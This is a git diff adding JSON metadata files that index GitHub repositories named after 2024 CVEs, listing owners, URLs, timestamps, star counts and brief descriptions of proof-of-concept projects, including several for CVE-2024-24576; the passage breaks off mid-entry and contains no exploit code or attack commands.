"updated_at": "2024-02-06T18:49:34Z", + "pushed_at": "2024-02-06T19:15:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24134.json b/2024/CVE-2024-24134.json new file mode 100644 index 0000000000..86fbc3da83 --- /dev/null +++ b/2024/CVE-2024-24134.json @@ -0,0 +1,33 @@ +[ + { + "id": 742531876, + "name": "CVE-2024-24134", + "full_name": "BurakSevben\/CVE-2024-24134", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24134", + "description": null, + "fork": false, + "created_at": "2024-01-12T17:31:15Z", + "updated_at": "2024-01-30T22:16:30Z", + "pushed_at": "2024-01-31T00:27:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24135.json b/2024/CVE-2024-24135.json new file mode 100644 index 0000000000..0dc804eaf2 --- /dev/null +++ b/2024/CVE-2024-24135.json @@ -0,0 +1,33 @@ +[ + { + "id": 742628195, + "name": "CVE-2024-24135", + "full_name": "BurakSevben\/CVE-2024-24135", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24135", + "description": null, + "fork": false, + "created_at": "2024-01-12T22:49:01Z", + "updated_at": "2024-01-30T22:34:13Z", + "pushed_at": "2024-01-31T00:28:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24136.json b/2024/CVE-2024-24136.json new file mode 100644 index 0000000000..460f906b79 --- /dev/null +++ b/2024/CVE-2024-24136.json @@ -0,0 +1,33 @@ +[ + { + "id": 742615317, + "name": "CVE-2024-24136", + "full_name": "BurakSevben\/CVE-2024-24136", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24136", + "description": null, + "fork": false, + "created_at": "2024-01-12T21:53:07Z", + "updated_at": "2024-01-30T22:51:47Z", + "pushed_at": "2024-01-31T00:29:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24137.json b/2024/CVE-2024-24137.json new file mode 100644 index 0000000000..6dec41596f --- /dev/null +++ b/2024/CVE-2024-24137.json @@ -0,0 +1,33 @@ +[ + { + "id": 742818106, + "name": "CVE-2024-24137", + "full_name": "BurakSevben\/CVE-2024-24137", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24137", + "description": null, + "fork": false, + "created_at": "2024-01-13T13:11:35Z", + "updated_at": "2024-01-30T23:07:02Z", + "pushed_at": "2024-01-31T00:29:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24138.json b/2024/CVE-2024-24138.json new file mode 100644 index 0000000000..bbe5481d92 --- /dev/null +++ b/2024/CVE-2024-24138.json @@ -0,0 +1,33 @@ +[ + { + "id": 742958060, + "name": "CVE-2024-24138", + "full_name": "BurakSevben\/CVE-2024-24138", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24138", + "description": null, + "fork": false, + "created_at": "2024-01-13T21:48:00Z", + "updated_at": "2024-01-30T23:12:31Z", + "pushed_at": "2024-01-31T00:30:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24139.json b/2024/CVE-2024-24139.json new file mode 100644 index 0000000000..3f8d51ed87 --- /dev/null +++ b/2024/CVE-2024-24139.json @@ -0,0 +1,33 @@ +[ + { + "id": 743331442, + "name": "CVE-2024-24139", + "full_name": "BurakSevben\/CVE-2024-24139", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24139", + "description": null, + "fork": false, + "created_at": "2024-01-15T01:48:55Z", + "updated_at": "2024-01-30T23:16:22Z", + "pushed_at": "2024-01-31T00:30:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24140.json b/2024/CVE-2024-24140.json new file mode 100644 index 0000000000..72e4d8201f --- /dev/null +++ b/2024/CVE-2024-24140.json @@ -0,0 +1,33 @@ +[ + { + "id": 746380106, + "name": "CVE-2024-24140", + "full_name": "BurakSevben\/CVE-2024-24140", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24140", + "description": null, + "fork": false, + "created_at": "2024-01-21T21:45:34Z", + "updated_at": "2024-01-30T23:22:08Z", + "pushed_at": "2024-01-31T00:25:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24141.json b/2024/CVE-2024-24141.json new file mode 100644 index 0000000000..51ed859735 --- /dev/null +++ b/2024/CVE-2024-24141.json @@ -0,0 +1,33 @@ +[ + { + "id": 746416963, + "name": "CVE-2024-24141", + "full_name": "BurakSevben\/CVE-2024-24141", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24141", + "description": null, + "fork": false, + "created_at": "2024-01-21T23:56:41Z", + "updated_at": "2024-01-30T23:44:32Z", + "pushed_at": "2024-01-31T00:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24142.json b/2024/CVE-2024-24142.json new file mode 100644 index 0000000000..77cec3b4d0 --- /dev/null +++ b/2024/CVE-2024-24142.json @@ -0,0 +1,33 @@ +[ + { + "id": 746424150, + "name": "CVE-2024-24142", + "full_name": "BurakSevben\/CVE-2024-24142", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24142", + "description": null, + "fork": false, + "created_at": "2024-01-22T00:36:05Z", + "updated_at": "2024-01-30T23:44:46Z", + "pushed_at": "2024-01-31T00:33:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2432.json b/2024/CVE-2024-2432.json new file mode 100644 index 0000000000..406861b68b --- /dev/null +++ b/2024/CVE-2024-2432.json @@ -0,0 +1,33 @@ +[ + { + "id": 772189617, + "name": "CVE-2024-2432-PaloAlto-GlobalProtect-EoP", + "full_name": "Hagrid29\/CVE-2024-2432-PaloAlto-GlobalProtect-EoP", + "owner": { + "login": "Hagrid29", + "id": 97426612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97426612?v=4", + "html_url": "https:\/\/github.com\/Hagrid29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hagrid29\/CVE-2024-2432-PaloAlto-GlobalProtect-EoP", + "description": null, + "fork": false, + "created_at": "2024-03-14T17:48:49Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-03-14T17:49:48Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 57, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24336.json b/2024/CVE-2024-24336.json new file mode 100644 index 0000000000..d2b2e47095 --- /dev/null +++ b/2024/CVE-2024-24336.json @@ -0,0 +1,33 @@ +[ + { + "id": 753635394, + "name": "CVE-2024-24336", + "full_name": "nitipoom-jar\/CVE-2024-24336", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-24336", + "description": null, + "fork": false, + "created_at": "2024-02-06T14:10:02Z", + "updated_at": "2024-02-06T14:55:25Z", + "pushed_at": "2024-02-06T15:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24337.json b/2024/CVE-2024-24337.json new file mode 100644 index 0000000000..58e0d6439d --- /dev/null +++ b/2024/CVE-2024-24337.json @@ -0,0 +1,33 @@ +[ + { + "id": 753703913, + "name": "CVE-2024-24337", + "full_name": "nitipoom-jar\/CVE-2024-24337", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-24337", + "description": null, + "fork": false, + "created_at": "2024-02-06T16:33:13Z", + "updated_at": "2024-02-06T16:33:45Z", + "pushed_at": "2024-02-06T16:33:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24386.json b/2024/CVE-2024-24386.json new file mode 100644 index 0000000000..80f70acd7d --- /dev/null +++ b/2024/CVE-2024-24386.json @@ -0,0 +1,33 @@ +[ + { + "id": 755087413, + "name": "CVE-2024-24386", + "full_name": "erick-duarte\/CVE-2024-24386", + "owner": { + "login": "erick-duarte", + "id": 59427098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59427098?v=4", + "html_url": "https:\/\/github.com\/erick-duarte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erick-duarte\/CVE-2024-24386", + "description": null, + "fork": false, + "created_at": "2024-02-09T12:22:08Z", + "updated_at": "2024-02-21T21:16:43Z", + "pushed_at": "2024-02-15T13:58:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24396.json b/2024/CVE-2024-24396.json new file mode 100644 index 0000000000..56eb640798 --- /dev/null +++ b/2024/CVE-2024-24396.json @@ -0,0 +1,33 @@ +[ + { + "id": 752985066, + "name": "CVE-2024-24396", + "full_name": "trustcves\/CVE-2024-24396", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24396", + "description": null, + "fork": false, + "created_at": "2024-02-05T08:43:33Z", + "updated_at": "2024-02-05T08:43:33Z", + "pushed_at": "2024-02-05T09:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24397.json b/2024/CVE-2024-24397.json new file mode 100644 index 0000000000..0ce4225c0c --- /dev/null +++ b/2024/CVE-2024-24397.json @@ -0,0 +1,33 @@ +[ + { + "id": 752995551, + "name": "CVE-2024-24397", + "full_name": "trustcves\/CVE-2024-24397", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24397", + "description": null, + "fork": false, + "created_at": "2024-02-05T09:08:34Z", + "updated_at": "2024-02-11T09:13:35Z", + "pushed_at": "2024-02-05T09:20:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24398.json b/2024/CVE-2024-24398.json new file mode 100644 index 0000000000..22c81d65be --- /dev/null +++ b/2024/CVE-2024-24398.json @@ -0,0 +1,33 @@ +[ + { + "id": 752998286, + "name": "CVE-2024-24398", + "full_name": "trustcves\/CVE-2024-24398", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24398", + "description": null, + "fork": false, + "created_at": "2024-02-05T09:15:17Z", + "updated_at": "2024-02-05T09:15:17Z", + "pushed_at": "2024-02-05T09:19:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24401.json b/2024/CVE-2024-24401.json new file mode 100644 index 0000000000..bcc5c175e0 --- /dev/null +++ b/2024/CVE-2024-24401.json @@ -0,0 +1,33 @@ +[ + { + "id": 759519319, + "name": "CVE-2024-24401", + "full_name": "MAWK0235\/CVE-2024-24401", + "owner": { + "login": "MAWK0235", + "id": 90433993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433993?v=4", + "html_url": "https:\/\/github.com\/MAWK0235", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MAWK0235\/CVE-2024-24401", + "description": "Auto exploitation tool for CVE-2024-24401. ", + "fork": false, + "created_at": "2024-02-18T20:05:46Z", + "updated_at": "2024-11-24T15:15:19Z", + "pushed_at": "2024-09-07T03:02:43Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24402.json b/2024/CVE-2024-24402.json new file mode 100644 index 0000000000..37a57ff9b6 --- /dev/null +++ b/2024/CVE-2024-24402.json @@ -0,0 +1,33 @@ +[ + { + "id": 759526495, + "name": "CVE-2024-24402", + "full_name": "MAWK0235\/CVE-2024-24402", + "owner": { + "login": "MAWK0235", + "id": 90433993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433993?v=4", + "html_url": "https:\/\/github.com\/MAWK0235", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MAWK0235\/CVE-2024-24402", + "description": "Priv esc in Nagios 2024R1.01", + "fork": false, + "created_at": "2024-02-18T20:33:28Z", + "updated_at": "2024-03-27T02:02:51Z", + "pushed_at": "2024-02-18T20:37:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24409.json b/2024/CVE-2024-24409.json new file mode 100644 index 0000000000..c643fc4380 --- /dev/null +++ b/2024/CVE-2024-24409.json @@ -0,0 +1,33 @@ +[ + { + "id": 864565102, + "name": "CVE-2024-24409", + "full_name": "passtheticket\/CVE-2024-24409", + "owner": { + "login": "passtheticket", + "id": 76125965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76125965?v=4", + "html_url": "https:\/\/github.com\/passtheticket", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passtheticket\/CVE-2024-24409", + "description": "ADManager Plus Build < 7210 Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2024-09-28T15:00:55Z", + "updated_at": "2024-10-04T14:04:50Z", + "pushed_at": "2024-09-28T17:24:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24488.json b/2024/CVE-2024-24488.json new file mode 100644 index 0000000000..2010215c87 --- /dev/null +++ b/2024/CVE-2024-24488.json @@ -0,0 +1,33 @@ +[ + { + "id": 751143948, + "name": "CVE-2024-24488", + "full_name": "minj-ae\/CVE-2024-24488", + "owner": { + "login": "minj-ae", + "id": 65323308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65323308?v=4", + "html_url": "https:\/\/github.com\/minj-ae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minj-ae\/CVE-2024-24488", + "description": "An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.", + "fork": false, + "created_at": "2024-02-01T02:29:19Z", + "updated_at": "2024-04-29T01:38:24Z", + "pushed_at": "2024-02-07T21:22:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24520.json b/2024/CVE-2024-24520.json new file mode 100644 index 0000000000..d4ab5a0e6e --- /dev/null +++ b/2024/CVE-2024-24520.json @@ -0,0 +1,33 @@ +[ + { + "id": 759242372, + "name": "CVE-2024-24520", + "full_name": "xF-9979\/CVE-2024-24520", + "owner": { + "login": "xF-9979", + "id": 108913864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108913864?v=4", + "html_url": "https:\/\/github.com\/xF-9979", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xF-9979\/CVE-2024-24520", + "description": "Arbitrary code execution vulnerability", + "fork": false, + "created_at": "2024-02-18T03:13:53Z", + "updated_at": "2024-03-17T07:58:21Z", + "pushed_at": "2024-03-17T07:58:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24549.json b/2024/CVE-2024-24549.json new file mode 100644 index 0000000000..f195b10c0a --- /dev/null +++ b/2024/CVE-2024-24549.json @@ -0,0 +1,33 @@ +[ + { + "id": 837384219, + "name": "CVE-2024-24549", + "full_name": "Abdurahmon3236\/CVE-2024-24549", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-24549", + "description": null, + "fork": false, + "created_at": "2024-08-02T21:05:34Z", + "updated_at": "2024-11-06T11:19:50Z", + "pushed_at": "2024-09-01T14:10:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24576.json b/2024/CVE-2024-24576.json new file mode 100644 index 0000000000..4bc3717a77 --- /dev/null +++ b/2024/CVE-2024-24576.json @@ -0,0 +1,286 @@ +[ + { + "id": 784438166, + "name": "CVE-2024-24576-PoC", + "full_name": "frostb1ten\/CVE-2024-24576-PoC", + "owner": { + "login": "frostb1ten", + "id": 68353531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68353531?v=4", + "html_url": "https:\/\/github.com\/frostb1ten", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/frostb1ten\/CVE-2024-24576-PoC", + "description": "Example of CVE-2024-24576 use case.", + "fork": false, + "created_at": "2024-04-09T21:17:15Z", + "updated_at": "2024-11-20T16:30:44Z", + "pushed_at": "2024-04-10T14:46:42Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 56, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 784676322, + "name": "CVE-2024-24576-PoC-Python", + "full_name": "brains93\/CVE-2024-24576-PoC-Python", + "owner": { + "login": "brains93", + "id": 60553334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60553334?v=4", + "html_url": "https:\/\/github.com\/brains93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brains93\/CVE-2024-24576-PoC-Python", + "description": null, + "fork": false, + "created_at": "2024-04-10T10:27:55Z", + "updated_at": "2024-11-20T16:30:44Z", + "pushed_at": "2024-04-12T09:22:40Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784763809, + "name": "CVE-2024-24576-Exploit", + "full_name": "aydinnyunus\/CVE-2024-24576-Exploit", + "owner": { + "login": "aydinnyunus", + "id": 52822869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52822869?v=4", + "html_url": "https:\/\/github.com\/aydinnyunus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aydinnyunus\/CVE-2024-24576-Exploit", + "description": "CVE-2024-24576 Proof of Concept", + "fork": false, + "created_at": "2024-04-10T14:06:09Z", + "updated_at": "2024-11-20T16:30:44Z", + "pushed_at": "2024-04-10T14:42:34Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "1-day", + "exploit", + "rust", + "security" + ], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 785163065, + "name": "CVE-2024-24576-PoC---Nim", + "full_name": "foxoman\/CVE-2024-24576-PoC---Nim", + "owner": { + "login": "foxoman", + "id": 5356677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5356677?v=4", + "html_url": "https:\/\/github.com\/foxoman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/foxoman\/CVE-2024-24576-PoC---Nim", + "description": "CVE-2024-24576 PoC for Nim Lang", + "fork": false, + "created_at": "2024-04-11T10:22:10Z", + "updated_at": "2024-08-02T21:50:14Z", + "pushed_at": "2024-04-11T11:27:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 785926402, + "name": "batbadbut-demo", + "full_name": "corysabol\/batbadbut-demo", + "owner": { + "login": "corysabol", + "id": 4594324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4594324?v=4", + "html_url": "https:\/\/github.com\/corysabol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corysabol\/batbadbut-demo", + "description": "This is a simple demo for the BadBatBut vulnerability CVE-2024-24576", + "fork": false, + "created_at": "2024-04-12T23:36:05Z", + "updated_at": "2024-04-26T12:20:52Z", + "pushed_at": "2024-04-18T04:24:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786291689, + "name": "CVE-2024-24576-PoC-Python", + "full_name": "mishl-dev\/CVE-2024-24576-PoC-Python", + "owner": { + "login": "mishl-dev", + "id": 91066601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91066601?v=4", + "html_url": "https:\/\/github.com\/mishl-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mishl-dev\/CVE-2024-24576-PoC-Python", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-24576", + "fork": false, + "created_at": "2024-04-14T02:10:55Z", + "updated_at": "2024-07-09T09:14:41Z", + "pushed_at": "2024-04-14T02:30:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 786321565, + "name": "CVE-2024-24576.jl", + "full_name": "lpn\/CVE-2024-24576.jl", + "owner": { + "login": "lpn", + "id": 619560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/619560?v=4", + "html_url": "https:\/\/github.com\/lpn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lpn\/CVE-2024-24576.jl", + "description": "Simple CVE-2024-24576 PoC in Julia", + "fork": false, + "created_at": "2024-04-14T05:00:18Z", + "updated_at": "2024-04-14T07:51:08Z", + "pushed_at": "2024-04-14T08:39:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789510981, + "name": 